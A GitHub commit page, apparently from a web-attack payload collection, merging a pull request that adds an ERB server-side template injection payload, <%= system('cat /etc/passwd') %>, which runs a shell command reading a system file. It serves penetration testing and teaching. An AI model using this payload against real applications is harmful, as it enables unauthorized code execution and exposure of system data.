Merge pull request #196 from idealphase/master

Adding Execute code using SSTI for ERB engine in SSTI vulnerability payload
This commit is contained in:
Swissky 2020-04-30 12:30:40 +02:00 committed by GitHub
commit 008cbcf9fc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -91,6 +91,11 @@ Slim:
### Code execution
Execute code using SSTI for ERB engine.
```ruby
<%= system('cat /etc/passwd') %>
```
Execute code using SSTI for Slim engine.
```powershell